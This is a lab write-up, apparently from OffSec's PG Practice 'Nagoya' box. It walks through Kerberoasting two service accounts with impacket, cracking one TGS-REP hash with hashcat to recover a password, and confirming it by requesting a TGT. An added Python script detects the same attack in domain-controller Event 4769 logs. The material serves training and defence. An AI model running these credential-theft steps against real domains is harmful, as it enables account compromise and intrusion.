Kerberoasting
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=andrea.hayes@nagoya.nagoya-industries.com.ccache impacket-GetUserSPNs NAGOYA-INDUSTRIES.COM/andrea.hayes@nagoya.nagoya-industries.com -k -no-pass -dc-ip $IP -dc-host nagoya.nagoya-industries.com
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------------- ------------ ------------------------------------------------ -------------------------- -------------------------- ----------
http/nagoya.nagoya-industries.com svc_helpdesk CN=helpdesk,CN=Users,DC=nagoya-industries,DC=com 2023-04-30 09:31:06.190955 <never>
MSSQL/nagoya.nagoya-industries.com svc_mssql 2023-04-30 09:45:33.288595 2024-08-02 04:59:53.706593
During the BloodHound enumeration, two service accounts were identified as kerberoastable.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=andrea.hayes@nagoya.nagoya-industries.com.ccache impacket-GetUserSPNs NAGOYA-INDUSTRIES.COM/andrea.hayes@nagoya.nagoya-industries.com -k -no-pass -dc-ip $IP -dc-host nagoya.nagoya-industries.com -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------------- ------------ ------------------------------------------------ -------------------------- -------------------------- ----------
http/nagoya.nagoya-industries.com svc_helpdesk CN=helpdesk,CN=Users,DC=nagoya-industries,DC=com 2023-04-30 09:31:06.190955 <never>
MSSQL/nagoya.nagoya-industries.com svc_mssql 2023-04-30 09:45:33.288595 2024-08-02 04:59:53.706593
$krb5tgs$23$*svc_helpdesk$NAGOYA-INDUSTRIES.COM$NAGOYA-INDUSTRIES.COM/svc_helpdesk*$f2c436ebdce26127c56f7249c727a15f$...
$krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$NAGOYA-INDUSTRIES.COM/svc_mssql*$63ab1301fddf00f02521ba17adee2649$...
Retrieving TGS-REP hashes for both the svc_helpdesk and svc_mssql accounts
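A detection-side view of the request above, as an added example that is not part of the original write-up: the `$krb5tgs$23$` prefix means the DC issued RC4-HMAC (etype 23, 0x17) service tickets, and each such request is recorded on the domain controller as Security Event ID 4769. The event records below are constructed, with simplified field names, a hypothetical second user and documentation-range IP addresses.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, the type seen in the $krb5tgs$23$ hashes above

# Constructed sample of Event ID 4769 fields (not captured from a real DC).
# Key names are simplified assumptions; example.user1 and the IPs are hypothetical.
SAMPLE_EVENTS = [
    {"time": "2025-04-23T19:10:01", "user": "andrea.hayes", "service": "svc_helpdesk", "etype": "0x17", "ip": "192.0.2.50"},
    {"time": "2025-04-23T19:10:02", "user": "andrea.hayes", "service": "svc_mssql", "etype": "0x17", "ip": "192.0.2.50"},
    {"time": "2025-04-23T19:11:40", "user": "example.user1", "service": "svc_mssql", "etype": "0x12", "ip": "192.0.2.21"},
    {"time": "2025-04-23T19:12:05", "user": "andrea.hayes", "service": "NAGOYA$", "etype": "0x12", "ip": "192.0.2.50"},
    {"time": "2025-04-23T19:12:30", "user": "example.user1", "service": "krbtgt", "etype": "0x17", "ip": "192.0.2.21"},
]

def is_suspect(ev):
    """RC4 ticket for a user-account service (not krbtgt, not a machine account)."""
    svc = ev["service"].lower()
    return int(ev["etype"], 16) == RC4_HMAC and svc != "krbtgt" and not svc.endswith("$")

def find_roasting(events, min_services=2, window=timedelta(minutes=5)):
    """Alert on requesters that pulled RC4 tickets for at least min_services
    distinct service accounts within the time window."""
    by_requester = defaultdict(list)
    for ev in filter(is_suspect, events):
        by_requester[(ev["user"], ev["ip"])].append(
            (datetime.fromisoformat(ev["time"]), ev["service"]))
    alerts = []
    for (user, ip), hits in by_requester.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            services = {s for t, s in hits[i:] if t - start <= window}
            if len(services) >= min_services:
                alerts.append({"user": user, "ip": ip, "services": sorted(services),
                               "first_seen": start.isoformat()})
                break
    return alerts

if __name__ == "__main__":
    for alert in find_roasting(SAMPLE_EVENTS):
        print(alert)
```

The threshold and window are starting points to tune per environment; where services support AES, an RC4 ticket for a user-account SPN is itself worth reviewing.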
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ hashcat -a 0 -m 13100 svc_helpdesk.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_helpdesk$NAGOYA-INDUSTRIES.COM$NAG...adb4cc
Time.Started.....: Wed Apr 23 19:13:39 2025 (4 secs)
Time.Estimated...: Wed Apr 23 19:13:43 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3860.8 kH/s (1.94ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[216361726f6c796e] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 50%
Started: Wed Apr 23 19:13:38 2025
Stopped: Wed Apr 23 19:13:44 2025
hashcat was unable to crack the TGS-REP hash for the svc_helpdesk account
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ hashcat -a 0 -m 13100 svc_mssql.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$NAGOYA-INDUSTRIES.COM/svc_mssql*$63ab1301fddf00f02521ba17adee2649$...:Service1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$NAGOYA...735e2a
Time.Started.....: Wed Apr 23 19:14:36 2025 (0 secs)
Time.Estimated...: Wed Apr 23 19:14:36 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3894.7 kH/s (1.86ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1044480/14344385 (7.28%)
Rejected.........: 0/1044480 (0.00%)
Restore.Point....: 1032192/14344385 (7.20%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: alexliam -> PORTTER
Hardware.Mon.#1..: Util: 20%
Started: Wed Apr 23 19:14:35 2025
Stopped: Wed Apr 23 19:14:38 2025
The TGS-REP hash for the svc_mssql account was cracked; the password is Service1
Validation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-getTGT NAGOYA-INDUSTRIES.COM/svc_mssql@nagoya.nagoya-industries.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: Service1
[*] Saving ticket in svc_mssql@nagoya.nagoya-industries.com.ccache
Validated
TGT generated for the svc_mssql account